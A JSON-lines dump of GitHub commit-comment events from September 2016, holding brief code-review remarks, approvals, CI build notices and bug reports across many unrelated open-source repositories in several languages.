{"id":"4630179488","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206108,"position":17,"line":17,"path":"src/pl/pikselke/mchw/craftings/CraftingInventory1.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T11:56:33Z","updated_at":"2016-09-28T11:56:33Z","body":"`static Inventory inv;` :ok_hand:\r\n\r\nzrób private i getter"}},"created_at":"2016-09-28T11:56:33Z"}
{"id":"4630180789","type":"CommitCommentEvent","actor":{"login":"pallavi-rao"},"repo":{"name":"InMobi/falcon"},"payload":{"comment":{"id":19206112,"position":null,"line":null,"path":null,"commit_id":"a2726b6f2b6980f7775cb129fd12f8a5b57d8d21","created_at":"2016-09-28T11:56:51Z","updated_at":"2016-09-28T11:56:51Z","body":"+1"}},"created_at":"2016-09-28T11:56:51Z"}
{"id":"4630186248","type":"CommitCommentEvent","actor":{"login":"Manduro"},"repo":{"name":"ngrx/example-app"},"payload":{"comment":{"id":19206124,"position":21,"line":21,"path":"src/util.ts","commit_id":"bc6f113cc0907f986b6fedd5d0f5ccfed278219f","created_at":"2016-09-28T11:58:03Z","updated_at":"2016-09-28T11:58:03Z","body":"@MikeRyan52 Typo and extra quote here, should be\r\n```ts\r\n    throw new Error(`Action type \"${label}\" is not unique`);\r\n```"}},"created_at":"2016-09-28T11:58:03Z"}
{"id":"4630188141","type":"CommitCommentEvent","actor":{"login":"andytaylor"},"repo":{"name":"andytaylor/activemq-artemis"},"payload":{"comment":{"id":19206128,"position":8,"line":68,"path":"artemis-protocols/artemis-amqp-protocol/src/main/java/org/apache/activemq/artemis/protocol/amqp/converter/jms/ServerJMSObjectMessage.java","commit_id":"b51de626b2fdbcb64ae71fd7eb2531402635feac","created_at":"2016-09-28T11:58:29Z","updated_at":"2016-09-28T11:58:29Z","body":"to handle cross protocol cases that add it"}},"created_at":"2016-09-28T11:58:29Z"}
{"id":"4630188731","type":"CommitCommentEvent","actor":{"login":"tvuillemin"},"repo":{"name":"les-campagnards/navco"},"payload":{"comment":{"id":19206131,"position":null,"line":null,"path":null,"commit_id":"616b72070b8ec505e8a93b338503fef50642df7f","created_at":"2016-09-28T11:58:38Z","updated_at":"2016-09-28T11:58:38Z","body":":+1: "}},"created_at":"2016-09-28T11:58:38Z"}
{"id":"4630189758","type":"CommitCommentEvent","actor":{"login":"spytheman"},"repo":{"name":"spytheman/repotest"},"payload":{"comment":{"id":19206133,"position":null,"line":null,"path":null,"commit_id":"59e61cab2f8bb800cec8eb6cb69310628ed55a28","created_at":"2016-09-28T11:58:51Z","updated_at":"2016-09-28T11:58:51Z","body":"It works fine."}},"created_at":"2016-09-28T11:58:51Z"}
{"id":"4630190690","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206135,"position":18,"line":18,"path":"src/pl/pikselke/mchw/listeners/PlayerInteractWorkBeanch.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T11:59:03Z","updated_at":"2016-09-28T11:59:03Z","body":"Na dodatek jeszcze to nie zadziała:\r\n\r\n- brak adnotacji `@EventHandler`\r\n- metoda statyczna (tutaj nie jestem pewien)"}},"created_at":"2016-09-28T11:59:03Z"}
{"id":"4630192641","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206139,"position":11,"line":11,"path":"src/pl/pikselke/mchw/listeners/PlayerJoinQuit.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T11:59:31Z","updated_at":"2016-09-28T11:59:31Z","body":"To samo co wyżej."}},"created_at":"2016-09-28T11:59:31Z"}
{"id":"4630196340","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19206147,"position":null,"line":null,"path":null,"commit_id":"7939db5e0df1fb4e50149b2188fc48b6276e013b","created_at":"2016-09-28T12:00:17Z","updated_at":"2016-09-28T12:00:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 66](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14461&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-28T12:00:17Z"}
{"id":"4630196712","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206148,"position":3,"line":3,"path":"src/pl/pikselke/mchw/objects/PistolsObjects.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T12:00:22Z","updated_at":"2016-09-28T12:00:22Z","body":"Hym, nie rozumiem. Nie lepiej, wygodniej zrobić jeden obiekt, dla jednej broni, i ewentualnie użyć interfejsu?"}},"created_at":"2016-09-28T12:00:22Z"}
{"id":"4630197331","type":"CommitCommentEvent","actor":{"login":"xmo-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19206149,"position":null,"line":null,"path":null,"commit_id":"52ba0552a4107178e95b1d7f618ccdc761212885","created_at":"2016-09-28T12:00:29Z","updated_at":"2016-09-28T12:00:29Z","body":"![657](https://cloud.githubusercontent.com/assets/7571158/18912663/e878df14-8583-11e6-9049-6f904710e989.png)\r\n"}},"created_at":"2016-09-28T12:00:29Z"}
{"id":"4630199583","type":"CommitCommentEvent","actor":{"login":"abma"},"repo":{"name":"spring/spring"},"payload":{"comment":{"id":19206154,"position":null,"line":null,"path":null,"commit_id":"b5474382b78bbffd2af65dcadd5274279738cf5b","created_at":"2016-09-28T12:00:58Z","updated_at":"2016-09-28T12:00:58Z","body":"thanks!"}},"created_at":"2016-09-28T12:00:58Z"}
{"id":"4630202601","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19206163,"position":null,"line":null,"path":null,"commit_id":"7939db5e0df1fb4e50149b2188fc48b6276e013b","created_at":"2016-09-28T12:01:37Z","updated_at":"2016-09-28T12:01:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 66](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14461&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:20"}},"created_at":"2016-09-28T12:01:37Z"}
{"id":"4630207335","type":"CommitCommentEvent","actor":{"login":"NSLogMeng"},"repo":{"name":"SnapKit/SnapKit"},"payload":{"comment":{"id":19206172,"position":null,"line":null,"path":null,"commit_id":"5c7ede844a7e190de05a1b14311c378358ea61c0","created_at":"2016-09-28T12:02:39Z","updated_at":"2016-09-28T12:02:39Z","body":"@robertjpayne 👌"}},"created_at":"2016-09-28T12:02:39Z"}
{"id":"4630210638","type":"CommitCommentEvent","actor":{"login":"cemak"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19206177,"position":2,"line":2,"path":"sql/updates/world/3.3.5/2016_09_28_02_world.sql","commit_id":"71dc6b9572463eb0c41a47ac0b241fc395c9559f","created_at":"2016-09-28T12:03:23Z","updated_at":"2016-09-28T12:03:23Z","body":"missed \";\""}},"created_at":"2016-09-28T12:03:23Z"}
{"id":"4630210928","type":"CommitCommentEvent","actor":{"login":"Miweizi"},"repo":{"name":"Miweizi/JSP"},"payload":{"comment":{"id":19206178,"position":null,"line":null,"path":null,"commit_id":"e63d2861d6bb80ef126eaa1a88343d0c462f1273","created_at":"2016-09-28T12:03:28Z","updated_at":"2016-09-28T12:03:28Z","body":"mdzz"}},"created_at":"2016-09-28T12:03:28Z"}
{"id":"4630215143","type":"CommitCommentEvent","actor":{"login":"giuband"},"repo":{"name":"ffont/freesound-explorer"},"payload":{"comment":{"id":19206193,"position":null,"line":null,"path":null,"commit_id":"05b9073e1f00eb8bbe86b9d3452bfc8c1f6204d3","created_at":"2016-09-28T12:04:29Z","updated_at":"2016-09-28T12:04:29Z","body":"#23 "}},"created_at":"2016-09-28T12:04:29Z"}
{"id":"4630217640","type":"CommitCommentEvent","actor":{"login":"kdeldycke"},"repo":{"name":"alrra/dotfiles"},"payload":{"comment":{"id":19206203,"position":null,"line":null,"path":null,"commit_id":"ab64cb3b4c5c1140d46e26a9060040c1040b9468","created_at":"2016-09-28T12:05:05Z","updated_at":"2016-09-28T12:05:05Z","body":"You're welcome!"}},"created_at":"2016-09-28T12:05:05Z"}
{"id":"4630225836","type":"CommitCommentEvent","actor":{"login":"sousben"},"repo":{"name":"sousben/bensousbot"},"payload":{"comment":{"id":19206213,"position":null,"line":null,"path":null,"commit_id":"4ef638fb43aa59e8a36f1f6561e9ff95149053fd","created_at":"2016-09-28T12:06:54Z","updated_at":"2016-09-28T12:06:54Z","body":"rollback to initial version"}},"created_at":"2016-09-28T12:06:54Z"}
{"id":"4630230821","type":"CommitCommentEvent","actor":{"login":"vlahx"},"repo":{"name":"vlahx/osposAdminLTE"},"payload":{"comment":{"id":19206220,"position":null,"line":null,"path":null,"commit_id":"8cfa7ae56cee6896907c3b12df327d9abed58f7e","created_at":"2016-09-28T12:07:54Z","updated_at":"2016-09-28T12:07:54Z","body":"Thx! Was a nice idea to make this repo on adminLTE. I like it ..."}},"created_at":"2016-09-28T12:07:54Z"}
{"id":"4630231668","type":"CommitCommentEvent","actor":{"login":"carlominucci"},"repo":{"name":"fanolug/sito"},"payload":{"comment":{"id":19206222,"position":null,"line":null,"path":null,"commit_id":"7437bd66968df551833bde6ed0882a6199fc2b9d","created_at":"2016-09-28T12:08:05Z","updated_at":"2016-09-28T12:08:05Z","body":"non so se sono d'accordo con la tua modifica"}},"created_at":"2016-09-28T12:08:05Z"}
{"id":"4630233085","type":"CommitCommentEvent","actor":{"login":"Maopy"},"repo":{"name":"vuejs/vue-router"},"payload":{"comment":{"id":19206225,"position":4,"line":7,"path":"docs/en/view.md","commit_id":"79bdcdafb92dc970b5b2043bbe3abf59e5f3452a","created_at":"2016-09-28T12:08:25Z","updated_at":"2016-09-28T12:08:25Z","body":"test"}},"created_at":"2016-09-28T12:08:25Z"}
{"id":"4630233751","type":"CommitCommentEvent","actor":{"login":"adamchainz"},"repo":{"name":"zestedesavoir/django-cors-middleware"},"payload":{"comment":{"id":19206227,"position":null,"line":null,"path":null,"commit_id":"9b068415a618982ac2e8fc05d60cc9f0f32ea8f3","created_at":"2016-09-28T12:08:35Z","updated_at":"2016-09-28T12:08:35Z","body":"Cherry-picked to upstream at https://github.com/ottoyiu/django-cors-headers/commit/6d39f59b1955ec3730e69b413c7a6e4c1b142731, thanks!"}},"created_at":"2016-09-28T12:08:35Z"}
{"id":"4630233803","type":"CommitCommentEvent","actor":{"login":"deadkash"},"repo":{"name":"barbieswimcrew/zip-code-validator"},"payload":{"comment":{"id":19206228,"position":null,"line":null,"path":null,"commit_id":"eb30c4b9e9ce469750c70fcc60ee651860fb0291","created_at":"2016-09-28T12:08:36Z","updated_at":"2016-09-28T12:08:36Z","body":"If I use getter on 226 line I always have empty $constraint->iso and validation is not working."}},"created_at":"2016-09-28T12:08:36Z"}
{"id":"4630233815","type":"CommitCommentEvent","actor":{"login":"kiddyseb"},"repo":{"name":"kiddyseb/helloworld"},"payload":{"comment":{"id":19206229,"position":null,"line":null,"path":null,"commit_id":"78475daa1bd3d4cad86a72e4119accf5ce6e7134","created_at":"2016-09-28T12:08:36Z","updated_at":"2016-09-28T12:08:36Z","body":"test comment"}},"created_at":"2016-09-28T12:08:36Z"}
{"id":"4630233963","type":"CommitCommentEvent","actor":{"login":"tank0412"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19206230,"position":null,"line":null,"path":null,"commit_id":"dfcd0d51b402887d7648a5cdbe45d105397e51a2","created_at":"2016-09-28T12:08:38Z","updated_at":"2016-09-28T12:08:38Z","body":"Yeah.\r\nBut in Z5's case it does not work.\r\nI disabled camera in defconfig (https://github.com/zf5/android_kernel_asus_T00F/commit/25312ce3560d2c77e01282c5bbfbb944fd14d596) and removed this in ramdisk:\r\n    insmod /lib/modules/imx111.ko\r\n    insmod /lib/modules/imx219.ko\r\nAlsoi removed all camera stuff from lib/hw and from lib.\r\nCamera stuff is still crashes.\r\n\r\nSo only libshim can fix issue with missing symbols in the old LP blobs.\r\n\r\n\r\n"}},"created_at":"2016-09-28T12:08:38Z"}
{"id":"4630236068","type":"CommitCommentEvent","actor":{"login":"kiddyseb"},"repo":{"name":"kiddyseb/helloworld"},"payload":{"comment":{"id":19206235,"position":null,"line":null,"path":null,"commit_id":"78475daa1bd3d4cad86a72e4119accf5ce6e7134","created_at":"2016-09-28T12:09:05Z","updated_at":"2016-09-28T12:09:05Z","body":"celui qui recoit ce mail est le owner de user Zentelia"}},"created_at":"2016-09-28T12:09:05Z"}
{"id":"4630239509","type":"CommitCommentEvent","actor":{"login":"001101"},"repo":{"name":"humhub/humhub-modules-custom-pages"},"payload":{"comment":{"id":19206239,"position":null,"line":null,"path":null,"commit_id":"b2bff948725aaa0cd98456c67e7560b0cb98ca5e","created_at":"2016-09-28T12:09:50Z","updated_at":"2016-09-28T12:09:50Z","body":"i also must say, that the update failed, because my mysql server died on progress, so i got a little mess up and had to delete the module folder, export the sql data, reinstall the module and import the data again, but it now works, maybe some more delays at the migration?"}},"created_at":"2016-09-28T12:09:50Z"}
{"id":"4630240094","type":"CommitCommentEvent","actor":{"login":"lesslol"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19206241,"position":null,"line":null,"path":null,"commit_id":"e34c5e00c52cc7b86a61246d095d4691a957dbce","created_at":"2016-09-28T12:09:57Z","updated_at":"2016-09-28T12:09:57Z","body":"There is missing character ; in the line 13\r\n"}},"created_at":"2016-09-28T12:09:57Z"}
{"id":"4630240188","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206243,"position":25,"line":25,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:09:59Z","updated_at":"2016-09-28T12:09:59Z","body":"Это что-то весьма странное, видимо когда доделывал ховеры и js просто пихнул внутрь кнопки поиска инпут :\\.\r\nВообще надо бы сделать обёрточный блок для формы и ссылки"}},"created_at":"2016-09-28T12:09:59Z"}
{"id":"4630240428","type":"CommitCommentEvent","actor":{"login":"hungryC"},"repo":{"name":"hungryC/aaa"},"payload":{"comment":{"id":19206244,"position":null,"line":null,"path":null,"commit_id":"ba809db41bc273a43e7a4f12050965b0071e1168","created_at":"2016-09-28T12:10:02Z","updated_at":"2016-09-28T12:10:02Z","body":"test"}},"created_at":"2016-09-28T12:10:02Z"}
{"id":"4630250007","type":"CommitCommentEvent","actor":{"login":"f2404"},"repo":{"name":"vitalif/grive2"},"payload":{"comment":{"id":19206271,"position":6,"line":53,"path":"libgrive/src/protocol/AuthAgent.cc","commit_id":"aa350335e35fc1cc73ecdcf1444909d4607c5557","created_at":"2016-09-28T12:12:09Z","updated_at":"2016-09-28T12:12:09Z","body":"Don't need 'return' here."}},"created_at":"2016-09-28T12:12:09Z"}
{"id":"4630250113","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19206272,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T12:12:10Z","updated_at":"2016-09-28T12:12:10Z","body":"^hahaha lol\r\ndream i want to ask\r\nhow to use auto change profile?\r\ni already check box,make 2 profile and reached 100/100 farming\r\nbut the bot still continue to farm , am i wrong to use it or what?\r\nwhen the bot trigger event auto change profile?"}},"created_at":"2016-09-28T12:12:10Z"}
{"id":"4630250881","type":"CommitCommentEvent","actor":{"login":"jlecoeur"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19206285,"position":6,"line":122,"path":"mission/mission_handler_landing.hxx","commit_id":"87cd84a7fddc055208cd236a7d12d4eeb226bae4","created_at":"2016-09-28T12:12:20Z","updated_at":"2016-09-28T12:12:20Z","body":"Ok then I would either:\r\n- in state DESCENT_TO_SMALL_ALTITUDE, give an altitude command of 0\r\n- make 0.5f a parameter"}},"created_at":"2016-09-28T12:12:20Z"}
{"id":"4630254096","type":"CommitCommentEvent","actor":{"login":"SidramBiradar"},"repo":{"name":"perliedman/leaflet-realtime"},"payload":{"comment":{"id":19206294,"position":null,"line":null,"path":null,"commit_id":"f78633710f0686373ca7c9a0a2ce3d5b2ef585ef","created_at":"2016-09-28T12:13:02Z","updated_at":"2016-09-28T12:13:02Z","body":"trying to use the same leaflet-realtime.js.. its telling require is not a function which a 3rd line in the leaflet-realtime.js file... let me know ASAP.. Thanks in advance"}},"created_at":"2016-09-28T12:13:02Z"}
{"id":"4630255891","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206301,"position":30,"line":30,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:13:25Z","updated_at":"2016-09-28T12:13:25Z","body":"Вообще можно, но так как фотошоп отказался импортить графику пришлось верстать 3 чёрточки. Можно было две сделать псевдоэлементами, а одну обычным элементом, но это было бы ещё хуже как по мне)"}},"created_at":"2016-09-28T12:13:25Z"}
{"id":"4630255908","type":"CommitCommentEvent","actor":{"login":"Nsovo"},"repo":{"name":"Nsovo/Angular"},"payload":{"comment":{"id":19206302,"position":null,"line":null,"path":null,"commit_id":"11b95c1296eb78985c78bbd4b4c4edd38769e449","created_at":"2016-09-28T12:13:26Z","updated_at":"2016-09-28T12:13:26Z","body":"revert"}},"created_at":"2016-09-28T12:13:26Z"}
{"id":"4630259280","type":"CommitCommentEvent","actor":{"login":"dheijl"},"repo":{"name":"dheijl/Delphi-XmlLite"},"payload":{"comment":{"id":19206312,"position":null,"line":null,"path":null,"commit_id":"00ebc43d5f27ccf643b9f09a1220997216ac27a2","created_at":"2016-09-28T12:14:10Z","updated_at":"2016-09-28T12:14:10Z","body":"I think\r\n\r\n    WriteStartDocument(XmlStandAlone.XmlStandalone_Omit);\r\n\r\nis supposed to work with the enums, but perhaps I'm missing something? I don't have Delphi here to check.\r\n\r\n"}},"created_at":"2016-09-28T12:14:10Z"}
{"id":"4630261050","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206315,"position":38,"line":38,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:14:33Z","updated_at":"2016-09-28T12:14:33Z","body":"Логично, надо было в отдельный блок их выделить"}},"created_at":"2016-09-28T12:14:33Z"}
{"id":"4630261308","type":"CommitCommentEvent","actor":{"login":"xzlbuaa"},"repo":{"name":"buaaxzl/Dynamic-Reverse-Proxy-for-Service4All"},"payload":{"comment":{"id":19206317,"position":2,"line":1,"path":"nginx-1.4.2-mem/readme.txt","commit_id":"cc1932d67d26a965dad61fafb64ac36b2bbf3108","created_at":"2016-09-28T12:14:37Z","updated_at":"2016-09-28T12:14:37Z","body":"乱码了\r\n"}},"created_at":"2016-09-28T12:14:37Z"}
{"id":"4630261716","type":"CommitCommentEvent","actor":{"login":"Nsovo"},"repo":{"name":"Nsovo/Angular"},"payload":{"comment":{"id":19206318,"position":null,"line":null,"path":null,"commit_id":"11b95c1296eb78985c78bbd4b4c4edd38769e449","created_at":"2016-09-28T12:14:42Z","updated_at":"2016-09-28T12:14:42Z","body":"revert"}},"created_at":"2016-09-28T12:14:42Z"}
{"id":"4630262112","type":"CommitCommentEvent","actor":{"login":"Nanomani"},"repo":{"name":"pydio/pydio-core"},"payload":{"comment":{"id":19206319,"position":null,"line":null,"path":null,"commit_id":"6066668c2de7b61fa825dd03ae12bad7af570546","created_at":"2016-09-28T12:14:48Z","updated_at":"2016-09-28T12:14:48Z","body":"this commit fix all pb with \"compress\" and \"download\"\r\n\r\nhttps://github.com/pydio/pydio-core/compare/develop...Nanomani:PowerFS_fix_WinOS\r\n"}},"created_at":"2016-09-28T12:14:48Z"}
{"id":"4630263154","type":"CommitCommentEvent","actor":{"login":"xzlbuaa"},"repo":{"name":"buaaxzl/Dynamic-Reverse-Proxy-for-Service4All"},"payload":{"comment":{"id":19206320,"position":null,"line":null,"path":null,"commit_id":"cc1932d67d26a965dad61fafb64ac36b2bbf3108","created_at":"2016-09-28T12:15:02Z","updated_at":"2016-09-28T12:15:02Z","body":"整个中文乱码了"}},"created_at":"2016-09-28T12:15:02Z"}
{"id":"4630264388","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206325,"position":39,"line":39,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:15:16Z","updated_at":"2016-09-28T12:15:16Z","body":"Ссылки, конечно, ошибся."}},"created_at":"2016-09-28T12:15:16Z"}
{"id":"4630267288","type":"CommitCommentEvent","actor":{"login":"jorndorff"},"repo":{"name":"Pingry-Java/StairCases-dbeckmen2019"},"payload":{"comment":{"id":19206329,"position":null,"line":null,"path":null,"commit_id":"bbcc7b4220a64af989f4b6cf72ae780d5f24cd2c","created_at":"2016-09-28T12:15:53Z","updated_at":"2016-09-28T12:15:53Z","body":"Removing the extraneous variables makes this pro quality. Good work.\r\n\r\nPS. Thanks for the author credit :)"}},"created_at":"2016-09-28T12:15:53Z"}
{"id":"4630269344","type":"CommitCommentEvent","actor":{"login":"Nsovo"},"repo":{"name":"Nsovo/Angular"},"payload":{"comment":{"id":19206336,"position":null,"line":null,"path":null,"commit_id":"11b95c1296eb78985c78bbd4b4c4edd38769e449","created_at":"2016-09-28T12:16:19Z","updated_at":"2016-09-28T12:16:19Z","body":"rever"}},"created_at":"2016-09-28T12:16:19Z"}
{"id":"4630269898","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19206339,"position":20,"line":20,"path":"Assets/YControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T12:16:26Z","updated_at":"2016-09-28T12:16:26Z","body":"имена функций должны быть говорящими"}},"created_at":"2016-09-28T12:16:26Z"}
{"id":"4630271369","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19206345,"position":6,"line":102,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/web/XWikiServletRequestStub.java","commit_id":"75490835df767d99ff40d3a5bd4eacf2cf137f76","created_at":"2016-09-28T12:16:45Z","updated_at":"2016-09-28T12:16:45Z","body":"The test release job was complaining yes."}},"created_at":"2016-09-28T12:16:45Z"}
{"id":"4630272804","type":"CommitCommentEvent","actor":{"login":"jorndorff"},"repo":{"name":"Pingry-Java/StairCases-tdrizzlewizard"},"payload":{"comment":{"id":19206350,"position":25,"line":43,"path":"StairCases.java","commit_id":"47541afd1d94ed8f79452791cdd8f6b8da3930f0","created_at":"2016-09-28T12:17:06Z","updated_at":"2016-09-28T12:17:06Z","body":"Recursion for the win! Awesome work."}},"created_at":"2016-09-28T12:17:06Z"}
{"id":"4630276446","type":"CommitCommentEvent","actor":{"login":"f2404"},"repo":{"name":"vitalif/grive2"},"payload":{"comment":{"id":19206355,"position":2,"line":2,"path":"libgrive/src/util/ProgressBar.cc","commit_id":"aa350335e35fc1cc73ecdcf1444909d4607c5557","created_at":"2016-09-28T12:17:53Z","updated_at":"2016-09-28T12:17:53Z","body":"It's C++ code, right?\r\nSuggest including <cmath> etc. instead of C headers."}},"created_at":"2016-09-28T12:17:53Z"}
{"id":"4630278111","type":"CommitCommentEvent","actor":{"login":"marcinslusarz"},"repo":{"name":"rkowalewski/nvml"},"payload":{"comment":{"id":19206359,"position":null,"line":null,"path":null,"commit_id":"570dd5bb279929119fa9a5a6c627d514ac426db1","created_at":"2016-09-28T12:18:16Z","updated_at":"2016-09-28T12:18:16Z","body":"Can you please submit this bugfix to pmem/nvml?\r\n\r\nThere's a similar code (without \"size *\") in alloc_pmemoid and alloc_toid (as in alloc_int), but those persists can be removed, because pmemobj_alloc/POBJ_NEW flush the destination PMEMoid."}},"created_at":"2016-09-28T12:18:16Z"}
{"id":"4630281128","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206365,"position":56,"line":56,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:18:51Z","updated_at":"2016-09-28T12:18:51Z","body":"Видимо по логике одна обёртка это сама ячейка(изначально весь блок был таблицей), а вторая для картинки, но тут можно одной вполне обойтись."}},"created_at":"2016-09-28T12:18:51Z"}
{"id":"4630283028","type":"CommitCommentEvent","actor":{"login":"lzxm160"},"repo":{"name":"lzxm160/libgonet"},"payload":{"comment":{"id":19206368,"position":null,"line":null,"path":null,"commit_id":"773e16eaf4c64e3ee4395c75c872a2defa369304","created_at":"2016-09-28T12:19:16Z","updated_at":"2016-09-28T12:19:16Z","body":"l"}},"created_at":"2016-09-28T12:19:16Z"}
{"id":"4630284689","type":"CommitCommentEvent","actor":{"login":"dengert"},"repo":{"name":"OpenSC/libp11"},"payload":{"comment":{"id":19206372,"position":46,"line":351,"path":"src/p11_key.c","commit_id":"7573c6e800cae3b429ae018c6a6bcdfe61bc1b4b","created_at":"2016-09-28T12:19:37Z","updated_at":"2016-09-28T12:19:37Z","body":"PKCS#11  supports multiple tokens on multiple slots. The issue maybe that the UI code is assuming only a single slot with one PIN.  (I have not looked closely at it, or how libp11 can handle multiple slots.) The UI and caching should be based on a PIN per slot.  "}},"created_at":"2016-09-28T12:19:37Z"}
{"id":"4630287137","type":"CommitCommentEvent","actor":{"login":"dheijl"},"repo":{"name":"dheijl/Delphi-XmlLite"},"payload":{"comment":{"id":19206378,"position":null,"line":null,"path":null,"commit_id":"00ebc43d5f27ccf643b9f09a1220997216ac27a2","created_at":"2016-09-28T12:20:09Z","updated_at":"2016-09-28T12:20:09Z","body":"I see what you mean, I forgot to change the function prototype, it still uses an integer instead of the enum. I don't have Delphi anymore but am happy to accept a pull request."}},"created_at":"2016-09-28T12:20:09Z"}
{"id":"4630289208","type":"CommitCommentEvent","actor":{"login":"f2404"},"repo":{"name":"vitalif/grive2"},"payload":{"comment":{"id":19206380,"position":72,"line":72,"path":"libgrive/src/util/ProgressBar.cc","commit_id":"aa350335e35fc1cc73ecdcf1444909d4607c5557","created_at":"2016-09-28T12:20:32Z","updated_at":"2016-09-28T12:20:32Z","body":"printf? puitchar? Not very C++-ish."}},"created_at":"2016-09-28T12:20:32Z"}
{"id":"4630289477","type":"CommitCommentEvent","actor":{"login":"jeroenooms"},"repo":{"name":"rstudio/tensorflow"},"payload":{"comment":{"id":19206381,"position":null,"line":null,"path":null,"commit_id":"3fe79127a29ae495df9a14aec6af6aebfa77204b","created_at":"2016-09-28T12:20:35Z","updated_at":"2016-09-28T12:20:35Z","body":"Aww you revoked it already :)"}},"created_at":"2016-09-28T12:20:35Z"}
{"id":"4630291566","type":"CommitCommentEvent","actor":{"login":"cdujeu"},"repo":{"name":"pydio/pydio-core"},"payload":{"comment":{"id":19206385,"position":null,"line":null,"path":null,"commit_id":"6066668c2de7b61fa825dd03ae12bad7af570546","created_at":"2016-09-28T12:21:01Z","updated_at":"2016-09-28T12:21:01Z","body":"ok can you submit a PR ? Will be in 6.5.3 then, we are shipping 6.5.2 today"}},"created_at":"2016-09-28T12:21:01Z"}
{"id":"4630295745","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19206387,"position":null,"line":null,"path":null,"commit_id":"d32edee386f29909e6a4ac2fd5735c4b269308e7","created_at":"2016-09-28T12:21:54Z","updated_at":"2016-09-28T12:21:54Z","body":"Was getting the base loot groups ready for the creature over hall for junk and some decent loot . a request was made to town the rancors back to how they were. "}},"created_at":"2016-09-28T12:21:54Z"}
{"id":"4630299154","type":"CommitCommentEvent","actor":{"login":"corrupt952"},"repo":{"name":"yujideveloper/health_check"},"payload":{"comment":{"id":19206397,"position":null,"line":null,"path":null,"commit_id":"00ccfce0dcda5d3fd6456cb29fe6c37d97f72a61","created_at":"2016-09-28T12:22:37Z","updated_at":"2016-09-28T12:22:37Z","body":"ここなんですけど、恐らくincludeにも同じの書いとかないとビルドが走らないっすね"}},"created_at":"2016-09-28T12:22:37Z"}
{"id":"4630304177","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19206411,"position":6,"line":102,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/web/XWikiServletRequestStub.java","commit_id":"75490835df767d99ff40d3a5bd4eacf2cf137f76","created_at":"2016-09-28T12:23:42Z","updated_at":"2016-09-28T12:23:42Z","body":"ok that's cool :)"}},"created_at":"2016-09-28T12:23:42Z"}
